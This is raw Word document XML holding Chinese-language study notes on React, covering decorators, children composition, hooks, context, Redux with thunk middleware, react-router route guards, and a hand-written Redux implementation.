        <w:numPr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19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react装饰器：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Config-overrides.js下面添加这个插件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config = injectBabelPlugin(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["@babel/plugin-proposal-decorators", { legacy: true }],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config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const NewKaikeba = withLog(withKaikeba(withLog(Kaikeba)));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@withLog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@withKaikeba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@withLog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class Kaikeba extends Component {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render() {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(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&lt;div&gt;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{this.props.stage}-{this.props.name}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&lt;/div&gt;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);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class Hoc extends Component {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render() {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(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&lt;div&gt;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&lt;Kaikeba stage="React" /&gt;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&lt;/div&gt;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);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顺序上从上到下的，一层层的调用，装饰器只能修饰class，函数是不行的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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react的slot：props.children 就是包含在组件中的代码，相当与vue中的匿名代码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Props.footer 相当与具名插槽：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React from "react";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Dialog(props) {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(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&lt;div style={{ border: `4px solid ${props.color || "blue"}` }}&gt;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{props.children}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&lt;div className="footer"&gt;{props.footer}&lt;/div&gt;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&lt;/div&gt;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);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WelcomeDialog通过复合提供内容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WelcomeDialog(props) {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(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&lt;Dialog {...props}&gt;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&lt;h1&gt;欢迎光临&lt;/h1&gt;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&lt;p&gt;感谢使用react&lt;/p&gt;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&lt;/Dialog&gt;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);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function() {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footer = &lt;button onClick={() =&gt; alert("确定！")}&gt;确定&lt;/button&gt;;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(&lt;div&gt;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&lt;WelcomeDialog color="green" footer={footer} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/div&gt;)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props.children 其实是个表达式，取决于组件包裹的内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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可以用于函数调用：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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Api = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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getUser() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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{ name: "jerry", age: 20 };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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Fetcher(props) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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user = Api[props.name]();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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props.children(user);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/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&lt;Fetcher name="getUser"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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{({ name, age }) =&gt; (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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{name}-{age}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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)}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/Fetcher&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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可以用于过滤标签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Filter({ children, type }) {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(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&lt;div&gt;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{React.Children.map(children, child =&gt; {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if (child.type !== type) {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return;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return child;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})}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&lt;/div&gt;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);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&lt;Filter type="p"&gt;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&lt;h1&gt;react&lt;/h1&gt;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&lt;p&gt;react很不错&lt;/p&gt;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&lt;h1&gt;vue&lt;/h1&gt;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&lt;p&gt;vue很不错&lt;/p&gt;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&lt;/Filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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可以修改组件属性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RadioGroup(props) {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(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&lt;div&gt;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{React.Children.map(props.children, child =&gt; {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//   vdom不可更改，克隆一个新的去改才行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return React.cloneElement(child, { name: props.name });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})}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&lt;/div&gt;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);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//解构出children，其他属性放到rest变量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Radio({children, ...rest}) {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(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&lt;label&gt;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&lt;input type="radio" {...rest} /&gt;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{children}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&lt;/label&gt;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);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&lt;RadioGroup name="mvvm"&gt;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&lt;Radio value="vue"&gt;vue&lt;/Radio&gt;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&lt;Radio value="react"&gt;react&lt;/Radio&gt;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&lt;Radio value="angular"&gt;angular&lt;/Radio&gt;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&lt;/RadioGroup&gt;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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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Hook  表示原来的函数形式的组件也可以用状态了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React,{useState,useEffect} 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react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function HookTest(){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//0代表count的初始值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[count,setCount] = useState(0)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多个的情况下：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[age] = useState(20)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[fruit,setFruit] =useState(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banana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[fruits,setFruits] =useState([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banana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app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])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Return (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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;p&gt;点击了&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;button onClick ={ ()=&gt;{setCount(count+1)}}&gt;点击&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/div&gt;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19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effect hook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React,{ useState,usrEffect } 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react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useEffect(()=&gt;{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Document.title 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你点击${count}次了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这个钩子相当于合并了componnetDidMount,componentUpdate,componentWillUnmount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//只调用一次的情况下这样配置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useEffect(()=&gt;{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//api调用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},[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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//count变化了才会执行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useEffect(()=&gt;{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//api调用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},[count])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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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自定义钩子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自定义hook是一个函数，名称用“use"开头，函数内部可以调用其他钩子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//可以用于api请求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useAge(){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[age,setAge] =useState(0)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useEffect(()=&gt;{ //相当于componentDitMount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setTimeout(()=&gt;{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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setAge(20)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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},2000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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return age;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function HookTest() {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//调用钩子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age = useAge();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(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&lt;p&gt;年龄：{age ? age : 'loading...'}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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）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19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react跨组件传递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React,{useContext} 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react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Mycontent React.createContext();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{Provider,Consumer} = MyContext;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child(prop){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&lt;div&gt;child:{prop.foo}&lt;/div&gt;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child2(){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Const ctx = useContext(MyContext);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Return &lt;div&gt;child2:{ctx.foo}&lt;/div&gt;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child3 extends React.component{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Static contectType = myContent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Render(){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Return &lt;div&gt;child3:{this.context.foo}&lt;/div&gt;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function ContentTest(){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Return (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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;provider value={{foo:bar}}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;Consumer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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{value=&gt;&lt;child {...value}&gt;&lt;/child&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;/Consumer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;child2 &gt;&lt;/child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="630" w:firstLineChars="3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&lt;child3 &gt;&lt;/child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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 w:firstLine="42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&lt;provider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/div&gt;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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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组件设计与实现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参见代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Redux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安装npm i redux -S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Redux中只有同步的概念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通过dispatch(action) 触发action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例子：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新建文件store.js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React from ‘react’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{createStore} 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redux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counterReducer = (state=0,action)=&gt;{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Switch(action.type){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Case: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add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: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Return state+1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Case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minus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:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Return state-1;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Default:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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Return state;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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store = createStore(counterReducer)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store;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//引用的组件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React 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react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store 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../store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function ReduxTest(){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Return (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;div&gt;{store.getState()}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;button onClick={()=&gt;store.dispath({type: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minus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})}&gt;&lt;/button&gt;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&lt;button onClick={()=&gt;store.dispath({type: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add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})}&gt;&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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//使用组件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在index.js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store from "./store";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ReactDOM.render(&lt;App /&gt;, document.getElementById("root"));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//调用dispacth之后，点阅改变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store.subscribe(() =&gt;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ReactDOM.render(&lt;App /&gt;, document.getElementById("root"))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);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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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react-redux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安装：npm install react-redux --save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//Store.js文件：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React from ‘react’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{createStore} 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redux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counterReducer = (state=0,action)=&gt;{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Switch(action.type){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Case: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add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Return state+1;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Case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minus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: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Return state-1;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Default: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Return state;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store = createStore(counterReducer)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store;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//ReduxTest代码：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React from "react";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 connect } from "react-redux";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mapStateToProps = state =&gt; ({ num: state.counter });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mapDispatchToProps = { add, minus};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function ReduxTest({ num, add, minus }) {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return (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&lt;div&gt;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&lt;p&gt;{num}&lt;/p&gt;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&lt;div&gt;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&lt;button onClick={minus}&gt;-&lt;/button&gt;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&lt;button onClick={add}&gt;+&lt;/button&gt;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&lt;/div&gt;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&lt;/div&gt;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);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}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export default connect(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mapStateToProps,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mapDispatchToProps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)(ReduxTest);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Index.js文件：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{Provider} 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react-redux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store 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./store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&lt;Provider store={store }&gt;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&lt;ReduxTest&gt;&lt;/ReDuxTest&gt;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&lt;/Provider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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react-thunk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1.安装：npm install redux-thunk -save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在触发action的到达store之前时候事实上可以经过多个中间键的，比如log，thunk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主要目录结构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///Store.js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 createStore, applyMiddleware, combineReducers } from "redux";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logger from "redux-logger";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thunk from "redux-thunk";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 counterReducer } from "./count.redux";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store = createStore(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combineReducers({ counter: counterReducer}),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applyMiddleware(logger, thunk)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store;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count.redux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.js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const counterReducer = (state = 0, action) =&gt; {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switch (action.type) {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case "add":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return state + 1;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case "minus":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return state - 1;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default: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return state;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const add = () =&gt; ({ type: "add" });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const minus = () =&gt; ({ type: "minus" });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const asyncAdd = () =&gt; dispatch =&gt; {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//   做异步操作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setTimeout(() =&gt; {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dispatch({ type: "add" });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}, 1500);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//主页面引用store.js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 Provider } from "react-redux";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store from "./store";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&lt;Provider store={store}&gt;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&lt;ReduxTest /&gt;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&lt;/Provider&gt;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//组件用法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 connect } from "react-redux";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 add, minus, asyncAdd } from "../store/count.redux"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//引用方法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mapStateToProps = state =&gt; ({ num: state.counter });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mapDispatchToProps = { add, minus, asyncAdd };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@connect(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mapStateToProps,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mapDispatchToProps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class ReduxTest extends React.Component {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render() {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{ num, minus, add, asyncAdd } = this.props;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(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&lt;div&gt;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&lt;p&gt;{num}&lt;/p&gt;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&lt;div&gt;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&lt;button onClick={minus}&gt;-&lt;/button&gt;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&lt;button onClick={add}&gt;+&lt;/button&gt;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&lt;button onClick={asyncAdd}&gt;AsyncAdd&lt;/button&gt;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&lt;/div&gt;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&lt;/div&gt;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);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ReduxTest;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19"/>
        </w:numPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="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react-rounter 4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安装：npm install react-router-dom -s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基本用法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//新建文件：user.redux.js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initial = {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isLogin: false,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loading: false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const user = (state = initial, action) =&gt; {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switch (action.type) {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case "requestLogin":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return {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isLogin: false,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loading: true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case "login":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return {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isLogin: true,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loading: false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default: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return state;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action creator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const login = () =&gt; dispatch =&gt; {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dispatch({ type: "requestLogin" });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//   做异步操作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setTimeout(() =&gt; {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dispatch({ type: "login" });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}, 2000);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//RouteSample.js 文件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React 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react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 connect } from "react-redux";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 login } from "../store/user.redux";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{ BrowserRouter,Link,Route，Switch } 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react-router-dom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home(params){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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;ul&gt;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&lt;li&gt;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&lt;Link to="/detail/web"&gt;Web架构师&lt;/Link&gt;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&lt;/li&gt;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&lt;li&gt;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&lt;Link to="/detail/python"&gt;Python架构师&lt;/Link&gt;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&lt;/li&gt;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&lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/div&gt;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About(params){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//路由嵌套 path=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/about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的时候显示这个组件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//路由为 path=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/about/**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的时候显示下面的组件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//Switch 为没有匹配到 path=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/about/**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的时候显示/about/me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return (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&lt;div&gt;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&lt;h3&gt;个人中心&lt;/h3&gt;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&lt;div&gt;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&lt;Link to="/about/me"&gt;个人信息&lt;/Link&gt;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&lt;Link to="/about/order"&gt;订单查询&lt;/Link&gt;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&lt;/div&gt;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&lt;Switch&gt;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&lt;Route path="/about/me" component={() =&gt; &lt;div&gt;Me&lt;/div&gt;} /&gt;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&lt;Route path="/about/order" component={() =&gt; &lt;div&gt;order&lt;/div&gt;} /&gt;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&lt;Redirect to="/about/me" /&gt;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&lt;/Switch&gt;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&lt;/div&gt;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);}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传递进来路由器对象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Detail(props) {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// 1.history: 导航指令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// 2.match: 获取参数信息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// 3.location: 当前url信息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console.log(props);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(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&lt;div&gt;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当前课程：{props.match.params.course}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&lt;button onClick={props.history.goBack}&gt;后退&lt;/button&gt;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&lt;/div&gt;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);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NoMatch({ location }) {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&lt;div&gt;404, {location.pathname}不存在&lt;/div&gt;;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登录组件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Login = connect(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state =&gt; ({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isLogin: state.user.isLogin,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loading: state.user.loading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}),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{ login }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)(function({ location, isLogin, login, loading }) {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redirect = location.state.redirect || "/";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if (isLogin) {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&lt;Redirect to={redirect} /&gt;;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(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&lt;div&gt;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&lt;p&gt;用户登录&lt;/p&gt;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&lt;hr /&gt;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&lt;button onClick={login} disabled={loading}&gt;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{loading ? "登录中..." : "登录"}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&lt;/button&gt;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&lt;/div&gt;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);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路由守卫 希望用法：&lt;PrivateRoute component={About} path="/about" ...&gt;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PrivateRoute = connect(state =&gt; ({ isLogin: state.user.isLogin }))(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({ component: Comp, isLogin, ...rest }) =&gt; {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 做认证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 render:根据条件动态渲染组件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(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&lt;Route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{...rest}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render={props =&gt;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isLogin ? (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&lt;Comp /&gt;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) : (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&lt;Redirect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to={{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pathname: "/login",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state: { redirect: props.location.pathname }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}}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/&gt;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)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/&gt;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);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function RouteSamle(){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(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&lt;div&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;BrowserRouter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="42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&lt;link to=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&gt;首页&lt;/link&gt;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&lt;link to=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/about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&gt;首页&lt;/link&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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 w:firstLine="840" w:firstLineChars="4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//exact 是路由完成匹配的意思 家这个后/about 就不会显示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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//Switch 的意思了只选择一个，如果都不匹配就匹配404</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;Switch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;Route exact path="/" component={() =&gt; home} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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840" w:firstLineChars="4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//路由守卫</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;PrivateRoute path="/about" component={About} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;Route path="/detail:course" component={() =&gt; home} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;Route path="/login" component={Login} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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{/* 404：没有path，必然匹配 */}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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&lt;Route component={NoMatch} /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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840" w:firstLineChars="4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&lt;/Switch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="840" w:firstLineChars="4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 w:firstLine="840" w:firstLineChars="4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&lt;/BrowserRouter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr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19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redux 原理：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export function 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>createStore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>reducer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, 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>enhancer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){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if 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enhancer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return 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enhancer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createStore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)(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reducer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let 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 xml:space="preserve">currentState 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 xml:space="preserve">= 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{} </w:t>
      </w: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//state其实就是一个对象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let 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 xml:space="preserve">currentListeners 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 xml:space="preserve">= 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[] </w:t>
      </w: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//通过发布订阅更新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function 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>getState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(){ </w:t>
      </w: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//调用方法直接返回state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return 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 xml:space="preserve">currentState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function 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>subscribe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>listener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){ </w:t>
      </w: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//订阅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currentListeners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push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listener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function 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>dispatch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>action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){ </w:t>
      </w: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//发布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 xml:space="preserve">currentState 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 xml:space="preserve">= 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reducer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currentState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, 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action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) </w:t>
      </w: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//调用传入的reducer函数，传入currentState，和action 更新函数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currentListeners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forEach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>v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>=&gt;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v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()) </w:t>
      </w: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//执行订阅函数更新，执行render更新重新读取state显示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return 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 xml:space="preserve">action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dispatch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({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type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:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>'@IMOOC/WONIU-REDUX'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})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return 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{ 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getState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, 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subscribe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, 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dispatch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//中间件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export function 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>applyMiddleware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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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>middlewares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){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//</w:t>
      </w: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 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enhancer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createStore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)(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reducer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) </w:t>
      </w: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//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enhancer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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 xml:space="preserve"> 就是下面的return函数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return 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>createStore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>=&gt;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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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>args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)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>=&gt;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const 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 xml:space="preserve">store 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 xml:space="preserve">= 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createStore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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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args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let 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 xml:space="preserve">dispatch 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 xml:space="preserve">= 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store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 xml:space="preserve">dispatch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//抽取store里面的state和方法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const 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 xml:space="preserve">midApi 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 xml:space="preserve">= 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getState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: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store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getState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dispatch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:(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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>args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)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>=&gt;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dispatch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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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args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//执行中间件列表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const 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 xml:space="preserve">middlewareChain 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 xml:space="preserve">= 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middlewares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map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>middleware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>=&gt;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middleware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midApi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))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 xml:space="preserve">dispatch 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 xml:space="preserve">= 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compose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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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middlewareChain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)(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store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dispatch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return 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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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store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 xml:space="preserve">dispatch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}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//这个函数的作用是把函数连式串联，上一个的返回值作为参数传入下一个参数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export function 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>compose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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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>funcs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){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if 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funcs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length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>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0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return 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>arg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>=&gt;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 xml:space="preserve">arg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if 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funcs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length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>==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>1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return 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funcs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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>0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]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return 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funcs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reduce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((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>ret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,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>item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)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 xml:space="preserve">=&gt; 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555555"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>...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>args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)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>=&gt;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ret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item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555555"/>
          <w:kern w:val="0"/>
